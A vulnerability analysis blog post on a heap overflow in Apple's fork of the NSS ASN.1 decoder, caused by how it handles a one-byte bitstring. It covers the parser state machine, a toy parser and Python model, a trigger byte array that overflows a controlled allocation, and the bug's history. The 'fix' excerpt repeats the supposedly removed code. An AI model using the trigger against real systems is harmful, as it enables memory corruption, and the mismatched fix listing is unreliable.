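    assert(out != NULL);
    assert(bits != NULL || bit_count == 0);

    if (bit_count > 126 * 8) {
        return 0;                        /* would need a multi-byte length */
    }
    size_t content_bytes = (bit_count + 7) / 8;
    size_t length = 1 + content_bytes;   /* +1 for the unused-bits byte */
    if (out_cap < 2 + length) {
        return 0;
    }
    uint8_t unused = (uint8_t)(content_bytes * 8 - bit_count);

    out[0] = 0x03;                       /* universal, primitive, bitstring */
    out[1] = (uint8_t)length;
    out[2] = unused;
    for (size_t i = 0; i < content_bytes; i++) {
        out[3 + i] = bits[i];
    }
    if (content_bytes > 0) {
        /* clear the unused low bits of the final content byte */
        out[2 + content_bytes] &= (uint8_t)(0xff << unused);
    }
    return 2 + length;
}
```

Encoding the three bits 101 this way gives the four bytes 03 02 05 a0, and an empty bitstring comes out as 03 01 00: a length of 1 with nothing but the unused-bits byte.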


Parsing ASN.1

ASN.1 data always needs to be decoded in tandem with a template that tells the parser what data to expect and also provides output pointers to be filled in with the parsed output data. Here's the template my test program uses to exercise the bitstring code:

const SecAsn1Template simple_bitstring_template[] = {
  {
    SEC_ASN1_BIT_STRING | SEC_ASN1_MAY_STREAM, // kind: bit string,
                                         //  may be constructed
    0,     // offset: in dest/src
    NULL,  // sub: subtemplate for indirection
    sizeof(SecAsn1Item) // size: of output structure
  }
};

A SecAsn1Item is a very simple wrapper around a buffer. We can provide a SecAsn1Item for the parser to use to return the parsed bitstring, then call the parser:

SecAsn1Item decoded = {0};
PLArenaPool* pool = PORT_NewArena(1024);
SECStatus status =
  SEC_ASN1Decode(pool,     // pool: arena for destination allocations
                 &decoded, // dest: decode encoded items into here
                 &simple_bitstring_template, // template
                 asn1_bytes,      // buf: asn1 input bytes
                 asn1_bytes_len); // len: input size

NSS ASN.1 state machine

The state machine has two core data structures:

SEC_ASN1DecoderContext - the overall parsing context

sec_asn1d_state - a single parser state, kept in a doubly-linked list forming a stack of nested states

Here's a trimmed version of the state object showing the relevant fields:

typedef struct sec_asn1d_state_struct {
  SEC_ASN1DecoderContext *top;
  const SecAsn1Template *theTemplate;
  void *dest;

  struct sec_asn1d_state_struct *parent;
  struct sec_asn1d_state_struct *child;

  sec_asn1d_parse_place place;

  unsigned long contents_length;
  unsigned long pending;
  unsigned long consumed;
  int depth;
} sec_asn1d_state;

The main engine of the parsing state machine is the method SEC_ASN1DecoderUpdate which takes a context object, raw input buffer and length:

SECStatus
SEC_ASN1DecoderUpdate (SEC_ASN1DecoderContext *cx,
                       const char *buf, size_t len)

The current state is stored in the context object's current field, and that current state's place field determines the current state which the parser is in. Those states are defined here:

typedef enum {
    beforeIdentifier,
    duringIdentifier,
    afterIdentifier,
    beforeLength,
    duringLength,
    afterLength,
    beforeBitString,
    duringBitString,
    duringConstructedString,
    duringGroup,
    duringLeaf,
    duringSaveEncoding,
    duringSequence,
    afterConstructedString,
    afterGroup,
    afterExplicit,
    afterImplicit,
    afterInline,
    afterPointer,
    afterSaveEncoding,
    beforeEndOfContents,
    duringEndOfContents,
    afterEndOfContents,
    beforeChoice,
    duringChoice,
    afterChoice,
    notInUse
} sec_asn1d_parse_place;

The state machine loop switches on the place field to determine which method to call:

  switch (state->place) {
    case beforeIdentifier:
      consumed = sec_asn1d_parse_identifier (state, buf, len);
      what = SEC_ASN1_Identifier;
      break;
    case duringIdentifier:
      consumed = sec_asn1d_parse_more_identifier (state, buf, len);
      what = SEC_ASN1_Identifier;
      break;
    case afterIdentifier:
      sec_asn1d_confirm_identifier (state);
      break;
...

Each state method which could consume input is passed a pointer (buf) to the next unconsumed byte in the raw input buffer and a count of the remaining unconsumed bytes (len).

It's then up to each of those methods to return how much of the input they consumed, and signal any errors by updating the context object's status field.
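
Here's a toy C model of that contract: a driver loop which switches on place, calls a handler, then advances the input by however many bytes the handler says it consumed. Everything prefixed toy_ is invented for this sketch and is far simpler than the real NSS code; it parses a single primitive element with a one-byte length and ignores templates, child states and error reporting.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy model only: these names are hypothetical, not NSS's. */
typedef enum { TOY_BEFORE_IDENTIFIER, TOY_BEFORE_LENGTH, TOY_DURING_LEAF,
               TOY_DONE, TOY_ERROR } toy_place;

typedef struct {
    toy_place place;
    uint8_t   identifier;
    size_t    pending;   /* content bytes still expected */
    size_t    consumed;  /* total input bytes consumed so far */
} toy_state;

/* Each handler returns how many bytes of buf it consumed. */
static size_t toy_parse_identifier(toy_state *s, const uint8_t *buf, size_t len)
{
    (void)len;
    s->identifier = buf[0];
    s->place = TOY_BEFORE_LENGTH;
    return 1;
}

static size_t toy_parse_length(toy_state *s, const uint8_t *buf, size_t len)
{
    (void)len;
    if (buf[0] & 0x80) {            /* multi-byte/indefinite lengths not modelled */
        s->place = TOY_ERROR;
        return 0;
    }
    s->pending = buf[0];
    s->place = s->pending ? TOY_DURING_LEAF : TOY_DONE;
    return 1;
}

static size_t toy_parse_leaf(toy_state *s, const uint8_t *buf, size_t len)
{
    (void)buf;
    size_t n = len < s->pending ? len : s->pending;
    s->pending -= n;
    if (s->pending == 0) {
        s->place = TOY_DONE;
    }
    return n;
}

/* Driver: dispatch on place, then skip past whatever the handler consumed. */
toy_place toy_update(toy_state *s, const uint8_t *buf, size_t len)
{
    assert(s != NULL && buf != NULL);
    while (len > 0 && s->place != TOY_DONE && s->place != TOY_ERROR) {
        size_t consumed = 0;
        switch (s->place) {
        case TOY_BEFORE_IDENTIFIER: consumed = toy_parse_identifier(s, buf, len); break;
        case TOY_BEFORE_LENGTH:     consumed = toy_parse_length(s, buf, len);     break;
        case TOY_DURING_LEAF:       consumed = toy_parse_leaf(s, buf, len);       break;
        default:                    break;
        }
        buf += consumed;
        len -= consumed;
        s->consumed += consumed;
    }
    return s->place;
}
```

Because the state lives outside the loop, the input can arrive in pieces: feeding the first three bytes of a seven-byte element leaves the toy parser in TOY_DURING_LEAF with pending == 4, and a second call with the rest finishes it. Note that correctness depends entirely on each handler keeping its return value and pending in step.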

The parser can be recursive: a state can set its ->place field to a state which expects to handle a parsed child state and then allocate a new child state. For example when parsing an ASN.1 sequence:

  state->place = duringSequence;
  state = sec_asn1d_push_state (state->top, state->theTemplate + 1,
                                state->dest, PR_TRUE);

The current state sets its own next state to duringSequence then calls sec_asn1d_push_state which allocates a new state object, with a new template and a copy of the parent's dest field.

sec_asn1d_push_state updates the context's current field such that the next loop around SEC_ASN1DecoderUpdate will see this child state as the current state:

    cx->current = new_state;

Note that the initial value of the place field (which determines the current state) of the newly allocated child is determined by the template. The final state in the state machine path followed by that child will then be responsible for popping itself off the state stack such that the duringSequence state can be reached by its parent to consume the results of the child.

Buffer management

The buffer management is where the NSS ASN.1 parser starts to get really mind bending. If you read through the code you will notice an extreme lack of bounds checks when the output buffers are being filled in - there basically are none. For example, sec_asn1d_parse_leaf, which copies the raw encoded string bytes, simply memcpy's into the output buffer with no check that the length of the string matches the size of the buffer.

Rather than using explicit bounds checks to ensure lengths are valid, the memory safety is instead supposed to be achieved by relying on the fact that decoding valid ASN.1 can never produce output which is larger than its input.

That is, there are no forms of decompression or input expansion so any parsed output data must be equal to or shorter in length than the input which encoded it. NSS leverages this and over-allocates all output buffers to simply be as large as their inputs.

For primitive strings this is quite simple: the length and input are provided so there's not much that can go wrong. But for constructed strings this gets a little fiddly...

One way to think of constructed strings is as trees of substrings, nested up to 32-levels deep. Here's an example:

An outer constructed definite length string with three children: a primitive string "abc", a constructed indefinite length string and a primitive string "ghi". The constructed indefinite string has two children, a primitive string "def" and an end-of-contents marker.


We start with a constructed definite length string. The string's length value L is the complete size of the remaining input which makes up this string; that number of input bytes should be parsed as substrings and concatenated to form the parsed output.

At this point the NSS ASN.1 string parser allocates the output buffer for the parsed output string using the length L of that first input string. This buffer is an over-allocated worst case. The part which makes it really fun though is that NSS allocates the output buffer then promptly throws away that length! This might not be so obvious from quickly glancing through the code though. The buffer which is allocated is stored as the Data field of a buffer wrapper type:

typedef struct cssm_data {
    size_t Length;
    uint8_t * __nullable Data;
} SecAsn1Item, SecAsn1Oid;

(Recall that we passed in a pointer to a SecAsn1Item in the template; it's the Data field of that which gets filled in with the allocated string buffer pointer here. This type is very slightly different between NSS and Apple's fork, but the difference doesn't matter here.)

That Length field is not the size of the allocated Data buffer. It's a (type-specific) count which determines how many bits or bytes of the buffer pointed to by Data are valid. I say type-specific because for bit-strings Length is stored in units of bits but for other strings it's in units of bytes. (CVE-2016-1950 was a bug in NSS where the code mixed up those units.)

Rather than storing the allocated buffer size along with the buffer pointer, each time a substring/child string is encountered the parser walks back up the stack of currently-being-parsed states to find the inner-most definite length string. As it's walking up the states it examines each state to determine how much of its input it has consumed in order to be able to determine whether it's the case that the current to-be-parsed substring is indeed completely enclosed within the inner-most enclosing definite length string.

If that sounds complicated, it is! The logic which does this is here, and it took me a good few days to pull it apart enough to figure out what this was doing:

sec_asn1d_state *parent = sec_asn1d_get_enclosing_construct(state);
while (parent && parent->indefinite) {
  parent = sec_asn1d_get_enclosing_construct(parent);
}

unsigned long remaining = parent->pending;
parent = state;
do {
  if (!sec_asn1d_check_and_subtract_length(&remaining,
                                           parent->consumed,
                                           state->top)
      ||
      /* If parent->indefinite is true, parent->contents_length is
       * zero and this is a no-op. */
      !sec_asn1d_check_and_subtract_length(&remaining,
                                           parent->contents_length,
                                           state->top)
      ||
      /* If parent->indefinite is true, then ensure there is enough
       * space for an EOC tag of 2 bytes. */
      (  parent->indefinite
          &&
          !sec_asn1d_check_and_subtract_length(&remaining,
                                               2,
                                               state->top)
      )
    ) {
      /* This element is larger than its enclosing element, which is
       * invalid. */
       return;
    }
} while ((parent = sec_asn1d_get_enclosing_construct(parent))
         &&
         parent->indefinite);

It first walks up the state stack to find the innermost constructed definite state and uses its state->pending value as an upper bound. It then walks the state stack again and for each in-between state subtracts from that original value of pending how many bytes could have been consumed by those in between states. It's pretty clear that the pending value is therefore vitally important; it's used to determine an upper bound so if we could mess with it this "bounds check" could go wrong.

After figuring out that this was pretty clearly the only place where any kind of bounds checking takes place I looked back at the fix more closely.

We know that sec_asn1d_parse_bit_string is the only function which changed:

static unsigned long
sec_asn1d_parse_bit_string (sec_asn1d_state *state,
                            const char *buf, unsigned long len)
{
    unsigned char byte;

    /*PORT_Assert (state->pending > 0); */
    PORT_Assert (state->place == beforeBitString);
    if ((state->pending == 0) || (state->contents_length == 1)) {
        if (state->dest != NULL) {
            SecAsn1Item *item = (SecAsn1Item *)(state->dest);
            item->Data = NULL;
            item->Length = 0;
            state->place = beforeEndOfContents;
        }
        if(state->contents_length == 1) {
            /* skip over (unused) remainder byte */
            return 1;
        }
        else {
            return 0;
        }
    }

    if (len == 0) {
        state->top->status = needBytes;
        return 0;
    }

    byte = (unsigned char) *buf;
    if (byte > 7) {
        dprintf("decodeError: parse_bit_string remainder oflow\n");
        PORT_SetError (SEC_ERROR_BAD_DER);
        state->top->status = decodeError;
        return 0;
    }

    state->bit_string_unused_bits = byte;
    state->place = duringBitString;
    state->pending -= 1;

    return 1;
}

The parts of this function which were removed by the patch are the (state->contents_length == 1) half of the first condition and the branch beneath it which returns 1. This function is meant to return the number of input bytes (pointed to by buf) which it consumed, and my initial hunch was that the patch removed a path through this function where the count of input bytes consumed and pending could get out of sync. It should be the case that when they return 1 in the removed code they also decrement state->pending, as they do in the other place where this function returns 1.

I spent quite a while trying to figure out how you could actually turn that into something useful but in the end I don't think you can.

So what else is going on here?

This state is reached with buf pointing to the first byte after the length value of a primitive bitstring. state->contents_length is the value of that parsed length. Bitstrings, as discussed earlier, are a unique ASN.1 string type in that they have an extra meta-data byte at the beginning (the unused-bits count byte.) It's perfectly fine to have a definite zero-length string - indeed that's (sort-of) handled earlier than this in the prepareForContents state, which short-circuits straight to afterEndOfContents:

if (state->contents_length == 0 && (! state->indefinite)) {
  /*
   * A zero-length simple or constructed string; we are done.
   */
  state->place = afterEndOfContents;

Here they're detecting a definite-length string type with a content length of 0. But this doesn't handle the edge case of a bitstring which consists only of the unused-bits count byte. The state->contents_length value of that bitstring will be 1, but it doesn't actually have any "contents".

It's this case which the (state->contents_length == 1) conditional in sec_asn1d_parse_bit_string matches:

    if ((state->pending == 0) || (state->contents_length == 1)) {
        if (state->dest != NULL) {
            SecAsn1Item *item = (SecAsn1Item *)(state->dest);
            item->Data = NULL;
            item->Length = 0;
            state->place = beforeEndOfContents;
        }
        if(state->contents_length == 1) {
            /* skip over (unused) remainder byte */
            return 1;
        }
        else {
            return 0;
        }
    }

By setting state->place to beforeEndOfContents they are again trying to short-circuit the state machine to skip ahead to the state after the string contents have been consumed. But here they take an additional step which they didn't take when trying to achieve exactly the same thing in prepareForContents. In addition to updating state->place they also NULL out the dest SecAsn1Item's Data field and set the Length to 0.

I mentioned earlier that the new child states which are allocated to recursively parse the sub-strings of constructed strings get a copy of the parent's dest field (which is a pointer to a pointer to the output buffer.) This makes sense: that output buffer is only allocated once then gets recursively filled-in in a linear fashion by the children. (Technically this isn't actually how it works if the outermost string is indefinite length, there's separate handling for that case which instead builds a linked-list of substrings which are eventually concatenated, see sec_asn1d_concat_substrings.)

If the output buffer is only allocated once, what happens if you set Data to NULL like they do here? Taking a step back, does that actually make any sense at all?

No, I don't think it makes any sense. Setting Data to NULL at this point should at the very least cause a memory leak, as it's the only pointer to the output buffer.

The fun part though is that that's not the only consequence of NULLing out that pointer. item->Data is used to signal something else.

Here's a snippet from prepare_for_contents when it's determining whether there's enough space in the output buffer for this substring:

} else if (state->substring) {
  /*
   * If we are a substring of a constructed string, then we may
   * not have to allocate anything (because our parent, the
   * actual constructed string, did it for us).  If we are a
   * substring and we *do* have to allocate, that means our
   * parent is an indefinite-length, so we allocate from our pool;
   * later our parent will copy our string into the aggregated
   * whole and free our pool allocation.
   */
  if (item->Data == NULL) {
    PORT_Assert (item->Length == 0);
    poolp = state->top->our_pool;
  } else {
    alloc_len = 0;
  }

As the comment implies, if both item->Data is NULL at this point and state->substring is true, then (they believe) it must be the case that they are currently parsing a substring of an outer-level indefinite string, which has no definite-sized buffer already allocated. In that case the meaning of the item->Data pointer is different to that which we describe earlier: it's merely a temporary buffer meant to hold only this substring. Just above here alloc_len was set to the content length of this substring; and for the outer-definite-length case it's vitally important that alloc_len then gets set to 0 here (which is really indicating that a buffer has already been allocated and they must not allocate a new one.)

To emphasize the potentially subtle point: the issue is that using this conjunction (state->substring && !item->Data) to determine whether this is a substring of a definite-length or an outer-level-indefinite string is not the same as the method used by the convoluted bounds checking code we saw earlier. That method walks up the current state stack and checks the indefinite bits of the super-strings to determine whether they're processing a substring of an outer-level-indefinite string.

Putting that all together, you might be able to see where this is going... (but it is still pretty subtle.)

Assume that we have an outer definite-length constructed bitstring with three primitive bitstrings as substrings:

Upon encountering the first outer-most definite length constructed bitstring, the code will allocate a fixed-size buffer, large enough to store all the remaining input which makes up this string, which in this case is 42 bytes. At this point dest->Data points to that buffer.

They then allocate a child state, which gets a copy of the dest pointer (not a copy of the dest SecAsn1Item object; a copy of a pointer to it), and proceed to parse the first child substring.

This is a primitive bitstring with a length of 1 which triggers the vulnerable path in sec_asn1d_parse_bit_string and sets dest->Data to NULL. The state machine skips ahead to beforeEndOfContents then eventually the next substring gets parsed - this time with dest->Data == NULL.

Now the logic goes wrong in a bad way and, as we saw in the snippet above, a new dest->Data buffer gets allocated which is the size of only this substring (2 bytes) when in fact dest->Data should already point to a buffer large enough to hold the entire outer definite-length input string. This bitstring's contents then get parsed and copied into that buffer.

Now we come to the third substring. dest->Data is no longer NULL; but the code now has no way of determining that the buffer was in fact only (erroneously) allocated to hold a single substring. It believes the invariant that item->Data only gets allocated once, when the first outer-level definite length string is encountered, and it's that fact alone which it uses to determine whether dest->Data points to a buffer large enough to have this substring appended to it. It then happily appends this third substring, writing outside the bounds of the buffer allocated to store only the second substring.

This gives you a great memory corruption primitive: you can cause allocations of a controlled size and then overflow them with an arbitrary number of arbitrary bytes.
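The sequence above can be modeled with a small Python sketch. This is a toy model, not Apple's code: the Item class, its capacity field (bookkeeping the real decoder does not have) and the decode_substrings function are all assumptions made for illustration. It only mimics the allocate-once, NULL-on-length-1, then-append behaviour described above and counts how many bytes would land outside the allocation.

```python
class Item:
    """Toy stand-in for SecAsn1Item; `capacity` is bookkeeping the real decoder lacks."""

    def __init__(self):
        self.data = None   # models item->Data (None plays the role of NULL)
        self.length = 0    # models item->Length, counted in bytes in this model
        self.capacity = 0  # true size of the current allocation


def decode_substrings(outer_length, substrings, apple_fork=True):
    """Return the number of bytes written past the end of the output buffer.

    `substrings` holds the contents of each primitive bitstring: the first
    byte of each is the unused-bits count, the rest is payload.
    """
    item = Item()
    # Outer definite-length constructed string: allocate once, up front.
    item.data = bytearray(outer_length)
    item.capacity = outer_length
    out_of_bounds = 0

    for contents in substrings:
        contents_length = len(contents)

        # prepare_for_contents: a substring that sees Data == NULL is assumed
        # to have an indefinite-length parent, so a buffer sized for this
        # substring alone is allocated.
        if item.data is None:
            item.data = bytearray(contents_length)
            item.capacity = contents_length
            item.length = 0

        # parse_bit_string in the fork: a length-1 bitstring NULLs the pointer.
        if apple_fork and contents_length == 1:
            item.data = None
            item.length = 0
            continue

        payload = contents[1:]  # skip the unused-bits byte
        for offset in range(item.length, item.length + len(payload)):
            if offset >= item.capacity:
                out_of_bounds += 1  # the real decoder would corrupt the heap here
        item.length += len(payload)

    return out_of_bounds


subs = [b"\x00", b"\x00\xff", b"\x00" + b"\xff" * 0x40]
print(decode_substrings(0x4A, subs))                    # forked behaviour
print(decode_substrings(0x4A, subs, apple_fork=False))  # without the extra check
```

With these three substrings the model reports 63 out-of-bounds bytes for the forked logic (a 64-byte copy starting one byte into a 2-byte allocation) and none once the contents_length == 1 branch is removed.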

Here's an example encoding for an ASN.1 bitstring which triggers this issue:

   uint8_t concat_bitstrings_constructed_definite_with_zero_len_realloc[]

        = {ASN1_CLASS_UNIVERSAL | ASN1_CONSTRUCTED | ASN1_BIT_STRING, // (0x23)

           0x4a, // initial allocation size

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x1, // force item->Data = NULL

           0x0, // number of unused bits in the final byte

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x2, // this is the reallocation size

           0x0, // number of unused bits in the final byte

           0xff, // only byte of bitstring

           ASN1_CLASS_UNIVERSAL | ASN1_PRIMITIVE | ASN1_BIT_STRING,

           0x41, // 64 actual bytes, plus the remainder, will cause 0x40 byte memcpy one byte in to 2 byte allocation

           0x0, // number of unused bits in the final byte

           0xff,

           0xff,// -- continues for overflow
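To make the length bookkeeping of this test case explicit, here is a small Python sketch that rebuilds the same bytes. The helper names are hypothetical. The tag values assume the standard universal BIT STRING tag number 3 and the constructed bit 0x20 (giving the 0x23 noted in the array), and the run of 0x40 bytes of 0xff is taken from the comment on the third substring rather than from the truncated listing.

```python
ASN1_BIT_STRING = 0x03   # universal class, primitive
ASN1_CONSTRUCTED = 0x20


def tlv(tag, contents):
    """Encode one element with a short-form (single byte) definite length."""
    if len(contents) > 0x7F:
        raise ValueError("short-form length only covers 0..127 bytes")
    return bytes([tag, len(contents)]) + contents


def primitive_bitstring(unused_bits, payload=b""):
    """Primitive BIT STRING: unused-bits byte followed by the payload."""
    return tlv(ASN1_BIT_STRING, bytes([unused_bits]) + payload)


children = (
    primitive_bitstring(0)                    # length 1: forces item->Data = NULL
    + primitive_bitstring(0, b"\xff")         # length 2: the reallocation size
    + primitive_bitstring(0, b"\xff" * 0x40)  # length 0x41: the overflowing copy
)
blob = tlv(ASN1_CONSTRUCTED | ASN1_BIT_STRING, children)
print(blob[:2].hex(), len(children))
```

The three children occupy 3 + 4 + 67 = 74 bytes, which is where the outer length of 0x4a comes from.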

Why wasn't this found by fuzzing?

This is a reasonable question to ask. This source code is really, really hard to audit; even with the diff it was at least a week of work to figure out the true root cause of the bug. I'm not sure if I would have spotted this issue during a code audit. It's very broken but it's quite subtle and you have to figure out a lot about the state machine and the bounds-checking rules to see it - I think I might have given up before I figured it out and gone to look for something easier.

But the trigger test-case is neither structurally complex nor large, and feels within-grasp for a fuzzer. So why wasn't it found? I'll offer two points for discussion:

Perhaps it's not being fuzzed?

Or at least, it's not being fuzzed in the exact form which it appears in Apple's Security.framework library. I understand that both Mozilla and Google do fuzz the NSS ASN.1 parser and have found a bunch of vulnerabilities, but note that the key part of the vulnerable code ("|| (state->contents_length == 1" in sec_asn1d_parse_bit_string) isn't present in upstream NSS (more on that below.)

Can it be fuzzed effectively?

Even if you did build the Security.framework version of the code and used a coverage guided fuzzer, you might well not trigger any crashes. The code uses a custom heap allocator and you'd have to either replace that with direct calls to the system allocator or use ASAN's custom allocator hooks. Note that upstream NSS does do that, but as I understand it, Apple's fork doesn't.

History

I'm always interested in not just understanding how a vulnerability works but how it was introduced. This case is a particularly compelling example because once you understand the bug, the code construct initially looks extremely suspicious. It only exists in Apple's fork of NSS and the only impact of that change is to introduce a perfect memory corruption primitive. But let's go through the history of the code to convince ourselves that it is much more likely that it was just an unfortunate accident:

The earliest reference to this code I can find is this, which appears to be the initial checkin in the Mozilla CVS repo on March 31, 2000:

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

    PORT_Assert (state->pending > 0);

    PORT_Assert (state->place == beforeBitString);

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

On August 24th, 2001 the form of the code changed to something like the current version, in this commit with the message "Memory leak fixes.":

static unsigned long

sec_asn1d_parse_bit_string (sec_asn1d_state *state,

                            const char *buf, unsigned long len)

{

    unsigned char byte;

-   PORT_Assert (state->pending > 0);

    /*PORT_Assert (state->pending > 0); */

    PORT_Assert (state->place == beforeBitString);

+   if (state->pending == 0) {

+       if (state->dest != NULL) {

+           SECItem *item = (SECItem *)(state->dest);

+           item->data = NULL;

+           item->len = 0;

+           state->place = beforeEndOfContents;

+           return 0;

+       }

+   }

    if (len == 0) {

        state->top->status = needBytes;

        return 0;

    }

    byte = (unsigned char) *buf;

    if (byte > 7) {

        PORT_SetError (SEC_ERROR_BAD_DER);

        state->top->status = decodeError;

        return 0;

    }

    state->bit_string_unused_bits = byte;

    state->place = duringBitString;

    state->pending -= 1;

    return 1;

}

This commit added the item->data = NULL line but here it's only reachable when pending == 0. I am fairly convinced that this was dead code and not actually reachable (and that the PORT_Assert which they commented out was actually valid.)

The beforeBitString state (which leads to the sec_asn1d_parse_bit_string method being called) will always be preceded by the afterLength state (implemented by sec_asn1d_prepare_for_contents.) On entry to the afterLength state state->contents_length is equal to the parsed length field and  sec_asn1d_prepare_for_contents does:

state->pending = state->contents_length;

So in order to reach sec_asn1d_parse_bit_string with state->pending == 0, state->contents_length would also need to be 0 in sec_asn1d_prepare_for_contents.

That means that in the if/else decision tree below, at least one of the two conditionals must be true:

        if (state->contents_length == 0 && (! state->indefinite)) {

            /*

             * A zero-length simple or constructed string; we are done.

             */

            state->place = afterEndOfContents;

...

        } else if (state->indefinite) {

            /*

             * An indefinite-length string *must* be constructed!

             */

            dprintf("decodeError: prepare for contents indefinite not construncted\n");

            PORT_SetError (SEC_ERROR_BAD_DER);

            state->top->status = decodeError;

yet it is required that neither of those be true in order to reach the final else which is the only path to reaching sec_asn1d_parse_bit_string via the beforeBitString state:

        } else {

            /*

             * A non-zero-length simple string.

             */

            if (state->underlying_kind == SEC_ASN1_BIT_STRING)

                state->place = beforeBitString;

            else

                state->place = duringLeaf;

        }

So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.
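The reachability argument can be checked mechanically with a tiny Python sketch. It is a simplification that models only the three quoted branches for a primitive bitstring (the real function has more cases), and the function name and string labels are hypothetical.

```python
from itertools import product


def place_after_length(contents_length, indefinite):
    """Toy version of the quoted branches of sec_asn1d_prepare_for_contents.

    Returns (next place, pending) for a primitive BIT STRING.
    """
    pending = contents_length  # state->pending = state->contents_length
    if contents_length == 0 and not indefinite:
        return "afterEndOfContents", pending
    elif indefinite:
        return "decodeError", pending
    else:
        return "beforeBitString", pending


# Look for any input that reaches beforeBitString with pending == 0.
reachable_with_zero_pending = [
    (length, indefinite)
    for length, indefinite in product(range(0, 4), (False, True))
    if place_after_length(length, indefinite) == ("beforeBitString", 0)
]
print(reachable_with_zero_pending)
```

The list comes back empty: every path into beforeBitString carries a non-zero pending count, which is why the pending == 0 branch in the 2001 version could never run.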

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits byte and attempted to add support for it. It looks like the state->pending == 0 conditional must have been Mozilla's check for handling a 0-length bitstring, so it was quite reasonable to think that handling that case by NULLing out item->data was the right thing to do, and that it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was handled perfectly correctly anyway in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked based on what looked like a special case handling for the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades to end up simply reverting a change made during the import. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

A Sneak Peek into Smart Contracts Reversing and Emulation

5 April 2022 at 10:00
In recent years the web3 topic has become increasingly relevant and, as with every buzzword, a lot of companies and start-ups have started developing solutions based on it. Consequently there has also been an increase in the number of attacks and vulnerabilities found in such projects, for example: Saurik’s write-up on Optimism, the PolyNetwork hack, the Ronin Validator compromise, and many more. In this post we will scratch the surface of the topic, limiting our focus to the Ethereum blockchain.

Sharing is Caring: Abusing Shared Sections for Code Injection

4 April 2022 at 16:00

Moving laterally across processes is a common technique seen in malware in order to spread across a system. In recent years, Microsoft has moved towards adding security telemetry to combat this threat through the "Microsoft-Windows-Threat-Intelligence" ETW provider.

